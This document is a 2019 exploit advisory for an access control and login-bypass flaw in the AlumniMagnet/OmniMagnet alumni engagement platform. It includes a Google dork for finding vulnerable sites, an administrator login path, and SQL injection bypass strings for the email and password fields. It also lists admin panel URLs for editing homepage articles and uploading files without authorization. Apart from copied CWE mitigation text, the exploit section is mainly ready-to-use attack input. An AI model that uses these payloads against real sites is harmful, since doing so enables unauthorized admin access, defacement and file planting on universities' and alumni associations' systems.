####################################################################
# Exploit Title : AlumniMagnet OmniMagnet Improper Access Control Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/05/2019
# Vendor Homepage : alumnimagnet.com ~ support.omnimagnet.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:Powered By AlumniMagnet + inurl:/article.html?aid= site:org
# Vulnerability Type : CWE-284 [ Improper Access Control ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description about Software :
***************************
The top alumni associations in the world use AlumniMagnet as their alumni engagement
and volunteer management platform. Made for large universities and colleges, schools
and their chapters. Enterprise Edition involves all of the Central features, but also brings
in connectivity between the university's alumni office and all of its associated
chapters, classes, and clubs.
####################################################################
# Impact :
***********
The software does not restrict or incorrectly restricts access to a resource from
an unauthorized actor.
There are two distinct behaviors that can introduce access control weaknesses:
Specification: incorrect privileges, permissions, ownership, etc. are explicitly specified for
either the user or the resource (for example, setting a password file to be world-writable, or
giving administrator capabilities to a guest user). This action could be performed by
the program or the administrator. Performing of activities carried out only by administrator
or program became available for all the users.
Enforcement: the mechanism contains errors that prevent it from properly enforcing the
specified access control requirements (e.g., allowing the user to specify their own privileges, or
allowing a syntactically-incorrect ACL to produce insecure settings). This problem occurs
within the program itself, in that it does not actually enforce the intended security
policy that the administrator specifies.
Potential Mitigations
Phases: Architecture and Design; Operation
Very carefully manage the setting, management, and handling of privileges.
Explicitly manage trust zones in the software.
Phase: Architecture and Design
Strategy: Separation of Privilege
Compartmentalize the system to have "safe" areas where trust boundaries can be
unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary
and always be careful when interfacing with a compartment outside of the safe area.
Ensure that appropriate compartmentalization is built into the system design and that
the compartmentalization serves to allow for and further reinforce privilege separation
functionality. Architects and designers should rely on the principle of least privilege
to decide when it is appropriate to use and to drop system privileges.
####################################################################
# Improper Access Control Exploit :
********************************
Non-Alumni Staff Administrator Page Login Path :
*******************************************
/user.html?op=login&non_alum=true
Faculty, Staff, Parents, and Non-Alumni
Members and Guests – click here and login below.
Administrator E-Mail Address :
****************************
ops@omnimagnet.com
'or''='@gmail.com
'or''='@yahoo.com
'or''='@hotmail.com
Administrator Password :
***********************
'or''='
' or 1=1 limit 1 -- -+
anything' OR 'x'='x
Useable Admin Control Panel Links :
********************************
We can change the articles on the homepage
without administrator permission.
/admin_article.html
/article.html?aid=[ID-NUMBER]
/admin_article.html?op=edit&aid=[ID-NUMBER]
/admin_files.html
/admin_files.html?sub_op=upload_files
Allowed files: jpg, png, gif, pdf, psd, eps, xls, xlsx, doc, docx, csv, txt, p12
Upload a File. Click Manage Uploads.
At the bottom of the page you can see the link showing where the image is going.
/images/vault/[ID-NUMBER].jpg
Look at File Destination => 'file_dest' => 'images/vault/[ID-NUMBER].jpg',
array (
'captcha' =>
array (
0 => '[RANDOM-ID-NUMBER]',
),
'current_user' => '1',
'current_user_first_name' => 'Magnet',
'current_user_aux_id' => '',
'current_user_permissions' => '[RANDOM-ID-NUMBER]',
'current_user_email' => 'ops@omnimagnet.com',
'current_user_nickname' => 'Magnet Team',
'signed_in_at' => '[DOMAIN-ADDRESS-HERE]',
'main_code' => NULL,
'last_update_date' => '[RANDOM-ID-NUMBER]',
'current_user_authenticated' => 'y',
'last_action_requested' => '[DOMAIN-ADDRESS-HERE]/admin_files.html?sub_op=upload_files',
'file_dest' => 'images/vault/[ID-NUMBER].jpg',
Sometimes it gives error like this -
Then you cannot have an admin account.
************************************
Access denied...
The page you requested requires staff clearance.
Make sure you are logged into the system before you proceed.
If you feel that this is an error, please contact an admin.
Authentication Error
Error code 201
The email/password combination you have entered does not match.
Please check your records and try again.
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################
